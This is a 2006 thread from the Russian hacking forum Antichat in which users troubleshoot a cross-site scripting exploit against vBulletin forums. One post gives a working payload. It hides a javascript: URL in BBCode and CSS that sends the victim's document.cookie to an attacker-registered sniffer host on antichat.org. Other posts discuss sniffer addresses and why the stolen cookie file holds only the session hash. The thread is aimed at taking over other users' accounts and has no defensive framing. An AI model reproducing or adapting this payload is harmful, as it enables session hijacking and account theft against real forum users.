Форум АНТИЧАТ - Уязвимость в vBulletin. Или abbsessionhash вместо полных куков

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)

- - Уязвимость в vBulletin. Или abbsessionhash вместо полных куков (https://forum.antichat.xyz/showthread.php?t=13203)

Smart12

19.01.2006 12:02

Уязвимость в vBulletin. Или abbsessionhash вместо полных куков

Использовал следующее:
http://video.antichat.net/file105.html

Проверка отработала, алерт вылазит.
Запускаю оснолвную процедуру.....
после перехода на искомый сайт создается файл в котором поидее должны лежать куки, а там лежит только bbsessionhash= значение и больше ничего.
Попробовал прям из формы ПМ, в заголовок вставил искомый код, в алерте выдает полные куки. При отработке скрипта - только сессионхэш.
В чем может быть причина? на заплатку не похоже, иначе проверки бы не работали.

Спасибо.

Electro

22.01.2006 17:25

А у меня другая проблема ...уже говорил сегодня в другой теме ... короче вставляю сплойт в форуме ..

Код HTML:

[EMAIL=[URL=s as=`s@wew.ew]mailto:assss@wew.ew ]

sssssss[/URL][/EMAIL]` style=`background:url(javaSCrip        t:document.Images[1].src="htt"+"p"+":"+"/"+"/"+"antichat.org/s/Electro.gif?"+document.cookie)`

алерт есть , сплойт не палиться но на сниффе пусто ...может я что нить не так сделал ? если да то буду блогодарен если подскажите...и еще я сижу под ИЕ! а не под оперой иль под файерфокс

woolf

23.01.2006 23:15

у меня таже проблема что и у Smart12...
помогите..

WizART

24.01.2006 22:47

Цитата:

antichat.org/s/Electro.gif?"+document.cookie)`

интересно откуда ты это взял, адрес сниффера: antichat.ru/sniff/s.jpg вроде

Rebz	24.01.2006 22:52

вообще-то на antichat.org можно зарегить персональный сниффер.. =) Так что все верно.

Smart12

23.02.2006 12:52

Может появились мысли?

Время: 01:22